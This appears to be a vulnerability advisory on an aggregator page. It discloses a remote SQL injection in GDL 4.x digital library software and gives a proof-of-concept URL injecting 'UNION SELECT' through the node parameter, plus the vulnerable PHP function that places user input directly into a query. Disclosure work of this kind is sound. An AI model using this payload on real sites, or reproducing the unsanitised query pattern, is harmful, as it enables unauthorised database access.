Lucene search
GDL 4.x (node) Remote SQL Injection Vulnerability
GDL 4.x (node) Remote SQL Injection Vulnerabilit
Show more
=================================================
GDL 4.x (node) Remote SQL Injection Vulnerability
=================================================
*******************************************************************************************
[ Discovered by g4t3w4y
[ transitory only http://jakartaweb.net/home/GDL-Digital-Library-SQL-Injection-Vulnerability.html :) ]
###################################################
# [ GDL v.4.x ] SQL Injection Vulnerability #
###################################################
#
# Script:
# GDL 4.0 | htdocs .gz
# GDL 4.0 | windows application
# GDL 4.2 | htdocs .zip
#
# Script site: http://kmrg.itb.ac.id
# Download: http://kmrg.itb.ac.id
#
# [SQL] Vuln : http://localhost/gdl.php?mod=browse&node=0+AND+1=2+UNION+SELECT+0,1,2--
#
# Bug: ./functions/browse.php (line: 286-311)
#
# function browse_child_list($node)
# {
# $strsql = "SELECT folder.*, folder_tree.NODE
# FROM folder, folder_tree
# WHERE
# folder_tree.PARENT = '$node' AND
# folder_tree.NODE = folder.NODE ";
#
# $dbres = mysql_query($strsql);
#
# if ($dbres){
# while ($row = mysql_fetch_array($dbres)){ // SQL inj
# $html .= browse_folder_print($row,2);
# }
#
# if (!empty($html)){
# $box_html = "<table cellSpacing=0 cellPadding=2 border=0>$html</table>";
# return $box_html;
# } else {
# return NULL;
# }
# } else {
# stdout_error(mysql_error());
# return NULL;
# }
# }
##################################################
# 0day.today [2018-03-14] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo17 Mar 2009 00:00Current
7.1High risk
Vulners AI Score7.1